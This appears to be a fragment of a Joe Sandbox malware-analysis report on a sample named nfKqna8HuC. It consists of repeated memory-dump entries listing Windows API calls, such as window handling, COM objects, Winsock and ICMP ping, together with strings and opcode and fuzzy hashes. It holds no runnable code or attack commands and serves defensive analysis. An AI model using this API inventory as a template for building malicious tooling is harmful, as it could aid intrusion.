                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: f5504b7bdeb60e8a0032226fd7d1527afee342268a29f846f9ceec220721c960
                                                                    • Instruction ID: 4a8a14b34d8dfd325805e974f0af3365941c497ec5564403d31f836c4188ee09
                                                                    • Opcode Fuzzy Hash: f5504b7bdeb60e8a0032226fd7d1527afee342268a29f846f9ceec220721c960
                                                                    • Instruction Fuzzy Hash: 3B513371B00205AFDF18DF68DD85AAEBBB6FB89301F14912DF91AD7290D771AE048B10
                                                                    APIs
                                                                      • Part of subcall function 0063B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0063B759,?,00000000,?,?,?,?,0063B72B,00000000,?), ref: 0063BA58
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0063B72B), ref: 0063B7F6
                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0063B88D
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0069D8A6
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0069D8D7
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0069D8EE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0063B72B,00000000,?,?,0063B2EF,?,?), ref: 0069D90A
                                                                    • DeleteObject.GDI32(00000000), ref: 0069D91C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: 1b7245c2de67fb1e5bc847d7422e7257a33955079c3745c429bedc3de01bc57a
                                                                    • Instruction ID: 5d5744b444b0af066195b816c7ecbf1b87d8c44838f6d056fcc4c062834dbdfa
                                                                    • Opcode Fuzzy Hash: 1b7245c2de67fb1e5bc847d7422e7257a33955079c3745c429bedc3de01bc57a
                                                                    • Instruction Fuzzy Hash: FC617B30501740DFDB25AF18D988BA5B7FBFF96316F14652DE2468AA60C770A881EF84
                                                                    APIs
                                                                      • Part of subcall function 0063B526: GetWindowLongW.USER32(?,000000EB), ref: 0063B537
                                                                    • GetSysColor.USER32(0000000F), ref: 0063B438
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 90bef84830d60550b9a4366cb2df3649bbfba2af97295350c335fb64db0dc0f9
                                                                    • Instruction ID: 3a80f4819ee71d3667896fcf39000d1f469fb8e8640ac49fd279c88f587c18d4
                                                                    • Opcode Fuzzy Hash: 90bef84830d60550b9a4366cb2df3649bbfba2af97295350c335fb64db0dc0f9
                                                                    • Instruction Fuzzy Hash: 5741B5301001449FDF246F28D889BF937A7AB06730F145265FE668E6EBD7319C42DBA5
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 136442275-0
                                                                    • Opcode ID: 5c42bb9c9f3b368608b6c9efe265b9274ae361669c5593db7026a23b7921c74e
                                                                    • Instruction ID: aff50ba10d46e86c8a16c5d805fec35cad2f9f5c0c8481734af51a215099a7b0
                                                                    • Opcode Fuzzy Hash: 5c42bb9c9f3b368608b6c9efe265b9274ae361669c5593db7026a23b7921c74e
                                                                    • Instruction Fuzzy Hash: 4441127684512CAEDFA1DB94DC85DDF73BEEF44300F0041AAB659A2051EA30ABD98F54
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(006BDC00,006BDC00,006BDC00), ref: 0066D7CE
                                                                    • GetDriveTypeW.KERNEL32(?,006D3A70,00000061), ref: 0066D898
                                                                    • _wcscpy.LIBCMT ref: 0066D8C2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: d45a2d029d3af9845f39fb04fc60927a085c660a4ac2ec0df03b1d147bacec6b
                                                                    • Instruction ID: 18da3fdfafee25e81f193af50b035bd839450e1aff0af62142e7211efd9000a9
                                                                    • Opcode Fuzzy Hash: d45a2d029d3af9845f39fb04fc60927a085c660a4ac2ec0df03b1d147bacec6b
                                                                    • Instruction Fuzzy Hash: CA51C731A04300AFC740EF14D891AAEB7A7EF94314F14992DF5AA573A2DB31ED05CB96
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 006293AB
                                                                    • __itow.LIBCMT ref: 006293DF
                                                                      • Part of subcall function 00641557: _xtow@16.LIBCMT ref: 00641578
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf_xtow@16
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 1502193981-2263619337
                                                                    • Opcode ID: ec7cc49bda9ab7a4e77eba028e51f91ea9d6a4b68009e454830444803ca7c0d5
                                                                    • Instruction ID: 59141d6b51dac739585cca02dd004e0e33cdef9f044e4e72a6a4a89e661e9e2f
                                                                    • Opcode Fuzzy Hash: ec7cc49bda9ab7a4e77eba028e51f91ea9d6a4b68009e454830444803ca7c0d5
                                                                    • Instruction Fuzzy Hash: 8941C571904614EFDB24DB74E941EAA73FAEF88350F20446EE149D7282EA319942CB65
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0068A259
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0068A260
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0068A273
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0068A27B
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0068A286
                                                                    • DeleteDC.GDI32(00000000), ref: 0068A28F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0068A299
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0068A2AD
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0068A2B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 82c226813516dbf804ac34f39141f1854de5838aceaf1b8747a51a4f4179739b
                                                                    • Instruction ID: b1aa58ab382371084d6355d552a61bab63fb1bce3e5f0e18cb42dfe1556ac44b
                                                                    • Opcode Fuzzy Hash: 82c226813516dbf804ac34f39141f1854de5838aceaf1b8747a51a4f4179739b
                                                                    • Instruction Fuzzy Hash: 9F319231100115BBEF21AFA4DC49FDA3B6AFF0E360F141315F916961A0C731E811DB64
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 2620052-3771769585
                                                                    • Opcode ID: 68ccef7f41a9ff3bee3d5892093c23294d8a8628f3c031ae6335bb958708dcfc
                                                                    • Instruction ID: aa21435735f192f4535eb597966d984d59fe3a2a6b1fd84e02f529f368f934d6
                                                                    • Opcode Fuzzy Hash: 68ccef7f41a9ff3bee3d5892093c23294d8a8628f3c031ae6335bb958708dcfc
                                                                    • Instruction Fuzzy Hash: 30110671904215AFDB24BB70FC0AEDA77AFEF41710F000069F106A6181FF70EA858B55
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00645047
                                                                      • Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E
                                                                    • __gmtime64_s.LIBCMT ref: 006450E0
                                                                    • __gmtime64_s.LIBCMT ref: 00645116
                                                                    • __gmtime64_s.LIBCMT ref: 00645133
                                                                    • __allrem.LIBCMT ref: 00645189
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006451A5
                                                                    • __allrem.LIBCMT ref: 006451BC
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006451DA
                                                                    • __allrem.LIBCMT ref: 006451F1
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0064520F
                                                                    • __invoke_watson.LIBCMT ref: 00645280
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                    • Instruction ID: bd29da6f4a3ef3adbbe531363105289fa7cbae70b787ff4c6b2a1a3e7c7a84fe
                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                    • Instruction Fuzzy Hash: 6C71FA75A00F17ABD714AE78CC41BAA73AAAF01764F14422EF912DB782E770DD4487D4
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00664DF8
                                                                    • GetMenuItemInfoW.USER32(006E1708,000000FF,00000000,00000030), ref: 00664E59
                                                                    • SetMenuItemInfoW.USER32(006E1708,00000004,00000000,00000030), ref: 00664E8F
                                                                    • Sleep.KERNEL32(000001F4), ref: 00664EA1
                                                                    • GetMenuItemCount.USER32(?), ref: 00664EE5
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00664F01
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00664F2B
                                                                    • GetMenuItemID.USER32(?,?), ref: 00664F70
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00664FB6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00664FCA
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00664FEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: 7310ba7c53fb3c6c3947db626a977e10d3500518f93ec57b4205b8931ac849da
                                                                    • Instruction ID: 5052f37ba04244d27df0bfebfc7e6030d18e46f0c5b72452b327c53daffbfbbd
                                                                    • Opcode Fuzzy Hash: 7310ba7c53fb3c6c3947db626a977e10d3500518f93ec57b4205b8931ac849da
                                                                    • Instruction Fuzzy Hash: 936193B1900289AFDB61DFA4DC84DEE7BBAFB85304F144059F442A7251DB31AD45DB21
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00689C98
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00689C9B
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00689CBF
                                                                    • _memset.LIBCMT ref: 00689CD0
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00689CE2
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00689D5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 76bb21c7c36b09ca3b1bda5a81d9b950f4892de440c25ab09d3f32441fb6f074
                                                                    • Instruction ID: 383047a701e47510afc90ef9b8b7ab08f219139fc5d1d55c8c2b3f649260003b
                                                                    • Opcode Fuzzy Hash: 76bb21c7c36b09ca3b1bda5a81d9b950f4892de440c25ab09d3f32441fb6f074
                                                                    • Instruction Fuzzy Hash: DF617B75900248AFDB11EFA8CC81EFE77B9EF09704F144259FA05AB2A1D770AD42DB64
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 006594FE
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00659549
                                                                    • VariantInit.OLEAUT32(?), ref: 0065955B
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0065957B
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 006595BE
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 006595D2
                                                                    • VariantClear.OLEAUT32(?), ref: 006595E7
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 006595F4
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006595FD
                                                                    • VariantClear.OLEAUT32(?), ref: 0065960F
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0065961A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 5ee69f1aa8e22f035af1d1b6bac5c9b53dc2747ab84e9a897bbc51e30611175e
                                                                    • Instruction ID: a389cb20f713cf8ff3d991df8ff16b01ab79658b532493706b6d51d69cda6f8d
                                                                    • Opcode Fuzzy Hash: 5ee69f1aa8e22f035af1d1b6bac5c9b53dc2747ab84e9a897bbc51e30611175e
                                                                    • Instruction Fuzzy Hash: 10412C71900219EFCB01EFA4DC449DEBBBAFF09355F008069F912A3251DB31AA59CFA5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?m$|?m
                                                                    • API String ID: 2862541840-333645321
                                                                    • Opcode ID: bc5182a9da01b93535e17e187aca815b7122f0dee7c9cadc14f9204582e374d0
                                                                    • Instruction ID: 02c6b4b4c34578f90b59582426342eb7bc393750d99b8ba0f7214a7600807b62
                                                                    • Opcode Fuzzy Hash: bc5182a9da01b93535e17e187aca815b7122f0dee7c9cadc14f9204582e374d0
                                                                    • Instruction Fuzzy Hash: 66919F71A00219ABDF24DF94C844FEEBBBAEF45710F10D55AF919AB280DB709941CFA0
                                                                    APIs
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • CoInitialize.OLE32 ref: 0067ADF6
                                                                    • CoUninitialize.OLE32 ref: 0067AE01
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,006AD8FC,?), ref: 0067AE61
                                                                    • IIDFromString.OLE32(?,?), ref: 0067AED4
                                                                    • VariantInit.OLEAUT32(?), ref: 0067AF6E
                                                                    • VariantClear.OLEAUT32(?), ref: 0067AFCF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 5ff72cc10bc36b5e91ab5fe1eccdc868c555a75ed1817057ad8863178b8d877c
                                                                    • Instruction ID: fcc9615ed983b62d121e93719aaf222a50c27efbfff2de334a8a8dd86bd42bd0
                                                                    • Opcode Fuzzy Hash: 5ff72cc10bc36b5e91ab5fe1eccdc868c555a75ed1817057ad8863178b8d877c
                                                                    • Instruction Fuzzy Hash: 72619A702087119FC710EFA4C844BAEBBEAAF89714F10851DF98A9B291C774ED45CB97
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00678168
                                                                    • inet_addr.WSOCK32(?), ref: 006781AD
                                                                    • gethostbyname.WSOCK32(?), ref: 006781B9
                                                                    • IcmpCreateFile.IPHLPAPI ref: 006781C7
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00678237
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0067824D
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006782C2
                                                                    • WSACleanup.WSOCK32 ref: 006782C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: ec4f797e992edb242e32dd7a7df9b83b3e70aff8f4c898f319678b7db5094be1
                                                                    • Instruction ID: 851e7e7d5752222b60a7ba52b74ac496e222462e50b7836428d3293b95e82fce
                                                                    • Opcode Fuzzy Hash: ec4f797e992edb242e32dd7a7df9b83b3e70aff8f4c898f319678b7db5094be1
                                                                    • Instruction Fuzzy Hash: 9C51A1316447019FD750AF24DC49B6ABBE6AF49321F048829F96AD73A2DB30ED01CF85
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066E396
